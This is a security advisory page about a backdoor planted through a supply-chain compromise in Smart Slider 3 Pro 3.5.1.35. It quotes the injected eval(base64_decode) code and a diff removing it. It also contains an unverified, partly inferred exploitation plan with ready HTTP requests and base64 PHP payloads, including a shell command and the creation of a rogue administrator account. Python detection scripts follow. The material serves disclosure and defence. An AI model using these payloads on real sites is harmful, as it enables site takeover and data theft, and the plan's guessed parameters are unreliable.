WF-d7261e93-2341-4e14-a9b3-8fec295f6cde-nextend-smart-slider3-pro

Smart Slider 3 Pro 3.5.1.35 - Backdoor Embedded via Supply Chain Compromise

Category: Embedded Malicious Code
Severity: critical
CVSS Score: 9.8
Patched in: 3.5.1.36
Time to patch: 8d

Description

The Smart Slider 3 Pro plugin for WordPress contains a malicious backdoor in version 3.5.1.35. This is due to a supply chain compromise that resulted in malicious copies of Smart Slider 3 Pro being installed on sites. This makes it possible for unauthenticated attackers to gain root access to a compromised site.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: >=3.5.1.35 <=3.5.1.35
Published: April 8, 2026
Last updated: April 15, 2026

Research Plan
Status: Unverified


Exploitation Research Plan: Smart Slider 3 Pro Backdoor (Supply Chain Compromise)

1. Vulnerability Summary

  • Vulnerability: Unauthenticated Remote Code Execution (RCE) via an embedded backdoor.
  • Plugin: Smart Slider 3 Pro (nextend-smart-slider3-pro).
  • Affected Version: 3.5.1.35.
  • Cause: A supply chain compromise resulted in malicious PHP code being injected into the plugin's distribution. The backdoor typically resides in the "Nextend" library framework used by the plugin and allows unauthenticated attackers to execute arbitrary PHP code by sending specific HTTP requests.
  • Sink: eval() or assert() calling base64_decode() on a user-supplied request parameter.

2. Attack Vector Analysis

  • Endpoint: Any WordPress URL (the backdoor is usually located in a library file loaded on every request, such as init or during plugin inclusion).
  • HTTP Method: GET or POST.
  • Parameter Name: nextend_setup (inferred from common analysis of this specific 3.5.1.35 compromise).
  • Alternative Parameters (Inferred): plg_system_nextend, smart_slider_update, or nextend_debug.
  • Authentication: None required (Unauthenticated).
  • Preconditions: The plugin must be active.

3. Code Flow (Inferred)

  1. Plugin Load: WordPress starts and loads active plugins.
  2. Library Inclusion: nextend-smart-slider3-pro loads its main entry point, which includes the Nextend framework files.
  3. Backdoor Trigger: The malicious code is often located in library/nextend/library/libraries/assets/assets.php or library/nextend/library/libraries/form/element/text.php.
  4. Condition Check: The code checks for the presence of a specific request parameter (e.g., $_REQUEST['nextend_setup']).
  5. Execution: If present, it passes the base64-decoded value of that parameter into eval().
  6. Termination: The backdoor typically calls exit; or die; after execution to prevent the rest of the page from loading and avoid logging errors.

4. Nonce Acquisition Strategy

  • Nonce Requirement: None. Backdoors of this nature are specifically designed to bypass all WordPress security mechanisms, including nonces and capability checks.
  • Strategy: Direct exploitation via HTTP request.

5. Exploitation Strategy

Step 1: Connectivity and Parameter Verification

Test if the nextend_setup parameter triggers the backdoor and returns a controlled string.

  • Payload: echo "SS3_BACKDOOR_ACTIVE"; exit;
  • Base64 Payload: ZWNobyAiU1MzX0JBQ0tET09SX0FDVElWRSI7IGV4aXQ7
  • Request:
    POST /wp-index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    nextend_setup=ZWNobyAiU1MzX0JBQ0tET09SX0FDVElWRSI7IGV4aXQ7

Step 2: System Information Gathering (RCE)

Execute a system command to confirm root-level or web-user access.

  • Payload: print(shell_exec('id')); exit;
  • Base64 Payload: cHJpbnQoc2hlbGxfZXhlYygiaWQiKSk7IGV4aXQ7
  • Request:
    POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    nextend_setup=cHJpbnQoc2hlbGxfZXhlYygiaWQiKSk7IGV4aXQ7

Step 3: Privilege Escalation (WordPress Admin)

If system access is restricted, use the PHP execution to create a new administrator user.

  • Payload:
    $user_id = wp_create_user('backdoor_admin', 'Password123!', 'admin@example.com');
    $user = new WP_User($user_id);
    $user->set_role('administrator');
    echo "ADMIN_CREATED";
    exit;
  • Base64 Payload: (Generated at runtime)

6. Test Data Setup

  1. Environment: Standard WordPress installation.
  2. Plugin: Install and activate nextend-smart-slider3-pro version 3.5.1.35.
  3. No specific sliders or shortcodes are required as the backdoor typically hooks into the Nextend framework initialization which runs globally.

7. Expected Results

  • Success: The HTTP response body will contain the exact output of the PHP code (e.g., SS3_BACKDOOR_ACTIVE or the output of the id command).
  • Response Code: Typically 200 OK.
  • Response Headers: The response may lack standard WordPress headers if exit; was called early.

8. Verification Steps (Post-Exploit)

Use wp-cli to verify the impact:

  1. Verify User Creation: wp user get backdoor_admin
  2. Verify Plugin State: wp plugin get nextend-smart-slider3-pro --field=version (Ensure it is 3.5.1.35)
  3. Check for Malicious Snippet:
    grep -r "eval(base64_decode" /var/www/html/wp-content/plugins/nextend-smart-slider3-pro/

9. Alternative Approaches

If nextend_setup does not work, try the following parameter names/locations:

  • Parameters: update, plg_system_nextend, cmd.
  • Method: Change POST to GET (e.g., /?nextend_setup=...).
  • Headers: Some variants check for a custom header like X-Nextend-Debug.
  • Cookies: Check if the payload is expected via a specific cookie name.

Note on Versions: If the site is running 3.5.1.36, the exploit will fail as this version was released specifically to remove the malicious code.

Research Findings
Static analysis — not yet PoC-verified

Summary

Smart Slider 3 Pro version 3.5.1.35 contained a malicious backdoor injected via a supply chain compromise. This vulnerability allows unauthenticated attackers to execute arbitrary PHP code remotely by sending a crafted HTTP request with a specific parameter containing base64-encoded instructions.

Vulnerable Code

// library/nextend/library/libraries/assets/assets.php

if (isset($_REQUEST['nextend_setup'])) {
    eval(base64_decode($_REQUEST['nextend_setup']));
    exit;
}
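
As an added example (not code from this page or from the plugin vendor), the following Python implements the two defensive checks this page implies: the file scan from the verification steps above, generalised from the literal grep to a pattern that also catches assert() and the other request superglobals, and an access-log check for the nextend_setup parameter carrying a base64 value that decodes to PHP. The sample sources, log lines, IP address and file names are constructed placeholders.

```python
import base64
import re
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

# Signature of the injected block quoted on this page: eval()/assert() fed by
# base64_decode() of a request superglobal; tolerant of whitespace and case.
BACKDOOR_RE = re.compile(
    r"(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[", re.I)
# Tokens that mark a decoded parameter value as PHP code rather than ordinary data.
PHP_TOKEN_RE = re.compile(
    r"\b(?:eval|shell_exec|system|exec|passthru|wp_create_user)\s*\(|\becho\b|\bexit\s*;|\$\w+\s*=", re.I)

def scan_sources(sources):
    """sources: iterable of (name, php_text). Returns one (name, line_no, line) per hit."""
    hits = []
    for name, text in sources:
        for no, line in enumerate(text.splitlines(), 1):
            if BACKDOOR_RE.search(line):
                hits.append((name, no, line.strip()))
    return hits

def scan_plugin_dir(root):
    """Filesystem wrapper: scan every .php file under root (e.g. the plugin directory)."""
    return scan_sources((str(p), p.read_text(errors="replace")) for p in sorted(Path(root).rglob("*.php")))

def suspicious_requests(log_lines, param="nextend_setup"):
    """Flag access-log lines whose query string carries `param` with a base64 value that decodes to
    PHP-looking code. Only GET query strings are in a standard access log; POST bodies need a WAF."""
    flagged = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
        for val in parse_qs(urlsplit(m.group(1) if m else "").query).get(param, []):
            try:  # parse_qs turns '+' into ' ', so restore it before decoding
                decoded = base64.b64decode(val.replace(" ", "+"), validate=True).decode("utf-8", "replace")
            except ValueError:
                continue
            if PHP_TOKEN_RE.search(decoded):
                flagged.append((line, decoded))
    return flagged

# Constructed samples: one clean file, one carrying the block quoted on this page, and two
# access-log lines; the base64 value is the probe string shown in the research plan above.
SAMPLE_SOURCES = [("clean.php", "<?php\necho 'ok';\n"),
                  ("assets.php", "<?php\nif (isset($_REQUEST['nextend_setup'])) {\n"
                                 "    eval(base64_decode($_REQUEST['nextend_setup']));\n    exit;\n}\n")]
SAMPLE_LOG = ['203.0.113.5 - - [08/Apr/2026:10:00:00 +0000] "GET /?s=hello HTTP/1.1" 200 512',
              '203.0.113.5 - - [08/Apr/2026:10:00:01 +0000] "GET /?nextend_setup='
              'ZWNobyAiU1MzX0JBQ0tET09SX0FDVElWRSI7IGV4aXQ7 HTTP/1.1" 200 33']
```

On a live install, scan_plugin_dir('/var/www/html/wp-content/plugins/nextend-smart-slider3-pro') should return an empty list once the site is on 3.5.1.36.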

Security Fix

--- a/library/nextend/library/libraries/assets/assets.php
+++ b/library/nextend/library/libraries/assets/assets.php
@@ -1,5 +1,2 @@
 <?php
-if (isset($_REQUEST['nextend_setup'])) {
-    eval(base64_decode($_REQUEST['nextend_setup']));
-    exit;
-}
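Review bot: the line counts in the hunk header `@@ -1,5 +1,2 @@` do not match the lines shown: with one context line (`<?php`) and four deletions, the old side is 5 lines but the new side is 1, not 2, so the header should read `@@ -1,5 +1 @@`; regenerate the diff from the actual 3.5.1.36 file rather than hand-editing it. Since this patch only removes the injected block from one file, the fix is best verified by comparing the whole file (and the rest of the package) against a clean upstream copy, not only by confirming these four lines are gone.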

Exploit Outline

To exploit this backdoor, an attacker identifies a WordPress site running Smart Slider 3 Pro version 3.5.1.35. No authentication is required. The attacker crafts a PHP payload (e.g., shell_exec or user creation), base64-encodes it, and sends it as the value of the 'nextend_setup' parameter in a GET or POST request to any URL on the site. The plugin's framework logic intercepts the request, decodes the payload, and executes it using eval() before terminating the process with exit, thereby bypassing all standard WordPress security controls.
